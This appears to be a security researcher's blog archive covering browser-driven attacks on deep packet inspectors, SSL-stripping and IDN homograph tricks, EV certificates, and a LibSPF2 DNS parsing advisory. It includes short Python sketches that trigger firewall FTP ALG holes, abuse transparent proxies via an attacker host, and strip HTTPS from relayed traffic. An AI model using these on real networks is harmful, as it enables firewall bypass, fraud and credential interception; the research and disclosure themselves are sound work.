Slides from Cansec, replete with TCP NAT2NAT goodness.
(In my defense, this trick is way less hideous than my 2001 IP TTL game!)
I’m just going to come out and say it: I miss packet craft. Sure, we can always pull out Scapy, and slap amusing packets together, but everything interesting is always at the other layers.
Or is it?
For CanSecWest this year, I thought it’d be interesting to take a look at the realm of Deep Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then…well, sort of stopped. So, in this year’s CanSecWest paper, “Staring Into The Abyss: Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection” (DOC, PDF), I’m taking another crack at the realm — and I’m seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.
Ah, but here’s where I need some help. I’ve worked pretty closely with Robert Auger from Paypal, who just published his own paper, “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”. We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we’ve kind of forgotten just how much can be done against Active FTP Application Layer Gateways.
So, if I may ask: take a look at my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation. Here’s the full summary, to whet your appetite:
DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.
Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.
First, firewalls and NATs — the most widely deployed packet inspectors on the Internet today — can still be made to open firewall holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP. We extend older work by integrating mechanisms for acquiring the correct internal IP address of a client, necessary for triggering many inspection engines; we survey other protocols, such as SIP and H.323, that have their own inspection engines; and we explore better strategies for triggering these vulnerabilities without socket engines from browser plugins. We also explore a potentially new mechanism, “Window Dribbling”, which allows an HTTP POST from a browser to be converted into a full bidirectional conversation by only allowing a remote sender to “dribble” a fixed number of bytes per segment.
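For the curious, the ALG trigger itself is tiny. Here’s a minimal Python sketch — the addresses and ports are hypothetical — of the one line an Active FTP inspection engine is watching for; if it appears on a flow the firewall believes is an FTP control channel, many ALGs will open an inbound hole to the named address:

```python
# Sketch only: the "PORT h1,h2,h3,h4,p1,p2" line that Active FTP clients
# emit, and that firewall ALGs parse to decide which inbound connection
# to permit. Values below are hypothetical.

def ftp_port_command(internal_ip: str, port: int) -> bytes:
    """Build an FTP PORT command naming (internal_ip, port) as the
    data channel the server should connect back to."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    octets = internal_ip.split(".")
    if len(octets) != 4:
        raise ValueError("expected a dotted-quad IPv4 address")
    p1, p2 = port >> 8, port & 0xFF  # the port travels as two base-256 digits
    return ("PORT %s,%d,%d\r\n" % (",".join(octets), p1, p2)).encode("ascii")

# An ALG that parses this on a port-21 flow may now allow the outside
# world to connect to 192.168.1.23:6667.
payload = ftp_port_command("192.168.1.23", 6667)  # b"PORT 192,168,1,23,26,11\r\n"
```

Note that the internal IP has to be the client’s real one — which is exactly why the paper spends time on techniques for learning it from inside the browser.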
Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).
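The proxy behavior is simple enough to sketch in a few lines of Python (the hosts here are placeholders): the socket is “allowed” because it connects back to the attacker’s own server, but an interception proxy that routes on the Host header will deliver the request somewhere else entirely:

```python
import socket

ATTACKER_IP = "203.0.113.10"      # where the plugin socket claims to be going
TARGET_HOST = "www.example.com"   # where a Host-routing proxy actually sends it

# The request says one thing in TCP (the destination IP) and another in
# HTTP (the Host header); a transparent proxy may believe the latter.
request = (
    "GET / HTTP/1.1\r\n"
    "Host: " + TARGET_HOST + "\r\n"
    "Connection: close\r\n"
    "\r\n"
).encode("ascii")

def fetch_via_transparent_proxy(ip: str = ATTACKER_IP) -> bytes:
    """Send the mismatched request; if an interception proxy sits in the
    path, the response comes from TARGET_HOST, not from ip."""
    with socket.create_connection((ip, 80), timeout=5) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)
```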
Third, and most interestingly, we find that active DPIs — those that actually alter the flow of traffic between a client and a server — all seem to expose subtly different parsers and handlers for the protocols they manipulate. These variations in behavior can be remotely fingerprinted, allowing an attacker to identify DPI platforms so as to correctly target his attacks. This capability, understood particularly in light of Felix Lindner’s recent work on generic attacks against Cisco infrastructure, underscores the need both for DPI vendors to test their platforms extensively, and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.
For remediation purposes, we recommend two lines of defense – one policy, one technical. As a matter of policy, we find the most important recommendation of this paper to be that industry reconsider its patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but aren’t closely tracking the equipment that binds endpoints together – despite its ever-increasing intelligence. This is as much a recommendation to vendors – to build patches quickly, and to code audit and fuzz with software from companies like BreakingPoint and Codenomicon – as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper does recognize the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have a particular need for correctness. There have been incidents in the past that have led to security vulnerabilities across entire ISPs.
On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to what existed in 2001 is not leading to more stable or more secure networks. We explore a solution that would potentially allow firewalls to integrate socket policies into their ALGs, encouraging plugin developers to eventually join with browser manufacturers in building a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which would prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to access their web interfaces from the Internet, and that this exposure can be repaired by tying default password effectiveness to either a button on the device or a power cycle.
The firewall fingerprinter should be online shortly, with source code for you to play with as well. Thanks!
(Incidentally, yep, Source is this week, and I have something rather different in store for that event. The times, they are busy.)
So Crystal and the rest of Workhabit just threw another Unconference: Cloudcamp Seattle. I’m actually pretty impressed with the crowd — there’s representation from Amazon EC2, Windows Azure, and RightScale (who, non-ironically, have actually implemented Cloud on Cloud). Crystal asked if I’d be willing to do a Cloud Security talk. The Man couldn’t fly out, but here are my thoughts on the cloud. Quick summary: there are ugly engineering (and procedural) issues we can’t actually ignore, mainly around escaping the management layer and the problem of intrusion disclosure, but:
a) This is such a superior way to deploy software, that I expect to see the necessary modifications to hardware and authentication technologies so as to obviate the threats in this deck, and
b) Private clouds are such an obvious value add that they’ll carry us through until the modifications are implemented.
I’ll throw video on as well if people want. Enjoy!
I’ll write more detailed commentary later, but here are the slides I recently presented at Black Hat.
I do need to make a post about DNSSEC at some point in the near future. But for now, I’d like to deal with the more immediate issue: Moxie’s SSL break.
You’ll note that’s not in quotes. There’s a pretty decent temptation to say Moxie’s attacks don’t “count”. Some of this comes from the fact that at the end of the day, these are his three attacks:
First, that when a site attempts to upgrade from HTTP to HTTPS, he can suppress the upgrade — possibly throwing in a “Lock” favicon which might trick the user.
Second, that HTTPS links embedded in the pages he relays can be rewritten on the wire to point at HTTP, so the secure session is never even requested.
Finally, Firefox’s (not IE’s) defenses against Eric Johanson’s IDN vulnerability could be bypassed by registering a domain and acquiring a wildcard cert in .cn.
The first two attacks have been discussed fairly extensively, while the third works in only one of the browsers. So there’s some grumbling. Let’s talk about that.
When I gave my DNS Cache Poisoning talk last year, I devoted quite a few slides to the failings of SSL. To put it simply, there’s a reason I didn’t consider SSL a sufficient defense for DNS Cache Poisoning. Indeed, the fact that the 302 Redirect could be replaced with a 200 OK — replacing https://www.paypal.com with http://www.paypal.com — is right there on the first slide. (His favicon trick is neat though.) And a few slides later, I ended up quoting my 2006 talk with respect to online banks and their tragic use of weak security forms, replete with cutesy “lock” icons. Obviously I didn’t discover either of these attacks; they, and the rest of the litany of weaknesses described in my 2008 deck, have long been the sort of failings in SSL that we’ve all known are pretty deeply problematic.
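The mechanics behind that first slide are almost embarrassingly small. A naive sketch in Python — a real tool, like the one Moxie released, does far more bookkeeping — is just a rewrite over the bytes a man-in-the-middle forwards:

```python
# Illustrative only: downgrade every HTTPS reference in traffic we relay,
# so redirects and links keep the victim on plaintext HTTP.

def strip_https(data: bytes) -> bytes:
    """Rewrite https:// references to http:// in a relayed response."""
    return data.replace(b"https://", b"http://")

redirect = b"HTTP/1.1 302 Found\r\nLocation: https://www.paypal.com/\r\n\r\n"
strip_https(redirect)  # the Location header now points at http://www.paypal.com/
```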
But, at least the way I look at it, Moxie’s talk wasn’t about some “l33t new protocol flaw” in SSL. He’s traveled that ground — in 2002, his finding that a certificate for http://www.badguy.com could sign another certificate for http://www.bank.com via the non-enforcement of Basic Constraints is about as “l33t” as it gets. That’s been fixed for years, though. This was instead a fairly searing critique of Security UI. Moxie introduced (to me, anyway) the concept of Positive vs. Negative Feedback. Negative Feedback occurs when the browser detects an out-and-out failure in the cryptography, and presents an error to the user. In response to the New Zealand bank data, in which 199 of 200 users ignored a negative prompt, browsers have been getting crazier and crazier about forcing users to jump through hoops in order to bypass a certificate error. The new negative errors are at the point where it is in fact easier to “balk” — to stop a web transaction, and move on to something else.
So Moxie’s putting his energy into the old positive feedback attacks — simply disabling the security, and seeing if anyone notices. And here he shows up with some pretty astonishing data: nobody noticed. To be specific, absolutely 0% of users presented with missing encryption on important web sites, while being asked to provide sensitive financial data to those sites, refused on the basis of the missing security.
Wow. 0%. Seriously.
Why don’t users “get it”?
The most heartbreaking thing I think from Moxie’s entire deck is where he shows off what his attack does to Paypal, on an older browser. Paypal, more than most sites, has some paranoid, whip-smart engineers who really want to ship the most secure web experience possible for their service. As such, they have what’s probably the single most widely deployed SSL-only site. 100% of Paypal can, and must, be retrieved over SSL.
Unless there’s a bad guy in the way, faking the real Paypal content over HTTP. Then Paypal looks just like your bank.
That the insecurity of other sites would train users not to expect security on yours was pretty cool (if sad) to see.
Where I do think things went a little off the tracks was when Moxie talked about his (pretty elegant) extension of Eric Johanson’s IDN attacks. IDNs, or Internationalized Domain Names, exist to allow other languages the ability to have web sites in their native character sets, rather than shunting everything into ASCII. What Eric did in 2005 was show that he could acquire a certificate for http://www.paypal.com — with the a being the Cyrillic а — and thus acquire the “lock”, apparently linked to a near-pixel-perfect rendering of Paypal’s address bar. These so-called “Homograph” attacks were dealt with by locking down the rendering of other character sets in the address bar.
The problem — and it’s worth exploring, because it reflects just how tricky it is to satisfy all those other demands besides security — is that the trivial way to lock down the address bar, to simply ban Chinese and Cyrillic and everything else — has some pretty serious geopolitical implications. What, America gets to have its domain names, and China doesn’t? What’s up with that? Different browsers have dealt with this problem in different ways. I believe the way IE has handled this is to ask the operating system what language the OS is in, and allow Chinese browsers to view Chinese characters, Russian browsers to view Cyrillic characters, and so on. It appears Firefox handled this instead by saying that domains in *.cn may contain Chinese characters, domains in *.ru may contain Cyrillic characters, and so on.
But nothing stops Moxie, an American, from registering a *.cn domain, acquiring a *.ijjk.cn certificate, and using the Chinese character that looks exactly like a slash to make a fake http://www.bankofwhatever.com/foo/bar/foo.ijjk.cn domain. It’s a cute trick.
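Under the hood, this whole class of trick comes down to IDN encoding: the user compares glyphs, while DNS compares the punycode the browser derives from them. A quick Python illustration (the domains are just examples):

```python
# Two strings a human can barely tell apart are, to DNS, entirely
# different names once non-ASCII labels are punycode-encoded.

genuine   = "paypal.com"
homograph = "p\u0430ypal.com"   # U+0430: CYRILLIC SMALL LETTER A

print(genuine == homograph)     # False — different code points
print(genuine.encode("idna"))   # b'paypal.com' — plain ASCII passes through
print(homograph.encode("idna")) # an "xn--" label: a different zone entry entirely
```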
It’s also precisely what EV certificates exist to solve.
There’s an amazing amount of confusion around Extended Validation — EV. I can’t claim innocence here; I myself was pretty clueless about why they exist until fairly recently. Here’s the deal: forget crazy tricks with Chinese characters — bad guys have been registering names along the lines of http://www.bank-of-whatever.com or http://www.bankofwhateverinc.com or http://www.bankofamerica.com.xyzy.com for years, and then acquiring certificates for those names. Moxie’s attack is neat, but once you hit the semantic space, there’s a practically unlimited number of potential namespace collisions. EV exists, pretty much exclusively, to deal with the problem of these semantic collisions. It does four things:
1) It requires a solid certificate chain, as opposed to one containing MD5.
2) It requires a human lawyer, versed in the laws and language of a particular jurisdiction, to determine the implied corporate relationship from the domain name and declare it valid.
3) It applies a green background to the entire address bar (IE) or its leftmost side (Firefox), increasing the amount of “positive feedback” (as Moxie puts it) that users will, it is hoped, learn to demand.
4) It explicitly inserts the human-lawyer-approved brand identity into the address bar, replete with a jurisdictional declaration. This, too, is there to add more positive feedback.
That’s what EV is for. It’s not at all there to deal with domain validated certs for http://www.bankofwhatever.com being incorrectly issued — see Adam Barth and Collin Jackson’s work in their paper, “Beware of Finer Grained Origins”. It’s not at all, as Moxie said in his talk, “Just the validation that CA’s should have been doing already”. Verisign et al have built an extensive, new positive feedback layer to deal with real world phishing attacks that, while not as elegant as Moxie’s Chinese Slash, were no less effective.
The real question, in the wake of Moxie’s work, is whether we have data showing that users notice the missing green bar and the missing brand identity. Or, even with EV sites, do users still ignore the missing security markings? I’m looking forward to seeing the data.
I really need to learn to leave DNS alone
DNS TXT Record Parsing Bug in LibSPF2
A relatively common bug parsing TXT records delivered over DNS, dating at least back to 2002 in Sendmail 8.2.0 and almost certainly much earlier, has been found in LibSPF2, a library frequently used to retrieve SPF (Sender Policy Framework) records and apply policy according to those records. This implementation flaw allows for relatively flexible memory corruption, and should thus be treated as a path to anonymous remote code execution. Of particular note is that the remote code execution would occur on servers specifically designed to receive E-Mail from the Internet, and that these systems may in fact be high volume mail exchangers. This creates privacy implications. It is also the case that a corrupted email server is a useful “jumping off” point for attackers to corrupt desktop machines, since attachments can be corrupted with malware while the containing message stays intact. So there are internal security implications as well, above and beyond corruption of the mail server on the DMZ.
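To make the bug class concrete: TXT RDATA arrives as a series of length-prefixed character-strings, and the recurring mistake is trusting the attacker-supplied length byte over the amount of data actually present. A defensive sketch in Python (illustrative only — this is not LibSPF2’s code):

```python
# TXT RDATA layout: <len><len bytes><len><len bytes>... The attacker
# controls every length byte, so each one must be checked against the
# buffer before copying; skipping that check is this class of bug.

def parse_txt_rdata(rdata: bytes) -> list:
    """Split TXT RDATA into its character-strings without ever reading
    past the end of the received buffer."""
    chunks, i = [], 0
    while i < len(rdata):
        length = rdata[i]
        i += 1
        if i + length > len(rdata):  # bounds-check the length byte
            raise ValueError("TXT chunk length exceeds record data")
        chunks.append(rdata[i:i + length])
        i += length
    return chunks

parse_txt_rdata(b"\x0bv=spf1 -all")  # [b'v=spf1 -all']
# parse_txt_rdata(b"\xffshort") would raise ValueError instead of over-reading
```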
Apparently LibSPF2 is actually used to secure quite a bit of mail traffic – there’s a lot of SPAM out there. Fix is out, see http://www.libspf2.org/index.html or your friendly neighborhood distro. Thanks to Shevek, CERT (VU#183657), Ken Simpson of MailChannels, Andre Engel, Scott Kitterman, and Hannah Schroeter for their help with this.
Edit: Special thanks, incidentally, to Coverity, who upon hearing that there was one bug, ran their static analyzer on LibSPF2 and found six more. Cool!
Someone asked for a cite on the Consumer Reports claims in my Black Hat 2008 slides. I went and tracked this down, and I actually picked this up from the Meandering Wildly blog. Looks like I misread this a bit — a previous dataset had come from Consumer Reports, but the data in my Black Hat deck actually came from Venafi, a security firm that specializes in systems management. Some collateral with more of their SSL data is here. Their methodology for collecting the data, according to Meandering Wildly:
It’s a phone poll, so it’s subject to standard errors of self-reporting, and their margin of error (2.5%) is given for a 0.1 confidence interval, which is a little slack for my tastes, but they have a large (N>1000), US-Census-representative sample, which maybe gives us intellectual permission enough to keep playing.
Of course, I also spoke about the one case we have hard data on — when the New Zealand bank’s cert went bad, and 99% of people didn’t care. Information on that case can be found here. I do wonder how these numbers might be changing in light of IE8 and FF3’s dramatically improved invalid SSL certificate experiences.
In general, anything I claim, I’m only too happy to back up, so if you have any questions regarding any of the details from a talk I’ve given, don’t hesitate to ask.